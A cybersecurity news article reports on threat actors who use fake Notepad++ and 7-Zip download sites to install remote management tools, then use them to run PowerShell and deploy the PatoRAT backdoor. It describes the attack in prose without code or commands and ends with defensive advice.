Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
PamStealer Mimics Maccy, Silently Harvests Data
July 4, 2026
Critical FatFs Vulnerabilities Expose Millions of Embedded Devices
July 4, 2026
Critical Linux Kernel Vulnerability CVE-2023-0179 Grants Root Access
July 4, 2026
Home/Threats/Threat Actors Using Fake Notepad++ and 7-zip Websites to Deploy Remote Monitoring Tools
Threats

Threat Actors Using Fake Notepad++ and 7-zip Websites to Deploy Remote Monitoring Tools

Threat actors are increasingly leveraging deceptive websites, mimicking popular software download pages, to distribute malicious Remote Monitoring and Management (RMM) tools. These deceptive sites...

David kimber
David kimber
January 27, 2026 3 Min Read
34 0

Threat actors are increasingly leveraging deceptive websites, mimicking popular software download pages, to distribute malicious Remote Monitoring and Management (RMM) tools.

These deceptive sites impersonate legitimate utilities like Notepad++ and 7-Zip, tricking users into installing remote access tools such as LogMeIn Resolve instead of the software they intended to download.

Once installed, these RMM tools allow attackers to seize full control of infected systems, execute commands remotely, and deploy additional malware payloads like PatoRAT.

The attack begins when users land on fraudulent download pages, often through advertisements or search engine manipulation.

These websites closely replicate the appearance and layout of official software distribution sites, making detection difficult for average users.

When visitors attempt to download Notepad++ or 7-Zip, the fake sites deliver LogMeIn Resolve or PDQ Connect—legitimate remote management tools that attackers repurpose for malicious objectives.

These tools register with their respective infrastructures upon installation, establishing a persistent connection that threat actors exploit to maintain access.

ASEC analysts identified a significant increase in attacks leveraging RMM tools during the initial infection phase.

Unlike traditional malware, these legitimate remote control applications often evade detection by antivirus software, presenting a serious challenge for security teams.

Camouflage utility download page (Source - ASEC)
Camouflage utility download page (Source – ASEC)

The researchers documented cases where attackers deployed both LogMeIn Resolve and PDQ Connect to execute PowerShell commands and install backdoor malware, creating multiple pathways for system compromise and data theft.

Infection Mechanism and Remote Access Deployment

The infection process relies on social engineering tactics that exploit user trust in familiar software brands. Fake websites display convincing download buttons, version numbers, and installation options that mirror legitimate pages.

When users execute the downloaded installer, they unknowingly install LogMeIn Resolve or PDQ Connect instead of the expected utility.

These RMM tools offer features such as remote support, patch management, and system monitoring—capabilities designed for IT administrators but weaponized by attackers for unauthorized access.

After installation completes, the RMM tools register with their cloud-based management infrastructure, enabling attackers to connect remotely without additional authentication.

The threat actors then execute PowerShell commands through the RMM interface to download and install PatoRAT, a backdoor that provides persistent access even if the RMM tool is later removed.

This multi-stage approach ensures continued control over compromised systems and allows attackers to deploy ransomware, steal credentials, or establish footholds in corporate networks.

Malware installation log using PDQ Connect (Source - ASEC)
Malware installation log using PDQ Connect (Source – ASEC)

Users should only download software from official websites and verify digital signatures and certificates before installation.

Organizations should implement endpoint detection and response solutions capable of monitoring RMM tool activity and identifying suspicious remote access patterns that indicate potential compromise.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitMalwarePatchransomwareSecurityThreat

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

New Lawsuit Claims that Meta Can Read All the WhatsApp Users Messages

Next Post

China-Aligned APTs Use PeckBirdy C&C Framework in Multi-Vector Attacks, Exploiting Stolen Certificates

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Apache ActiveMQ Critical Vulnerabilities Allow DoS Attacks, System Crashes
July 3, 2026
Scammers Impersonate Brands in Gambling Ads to Drive Casino Traffic
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us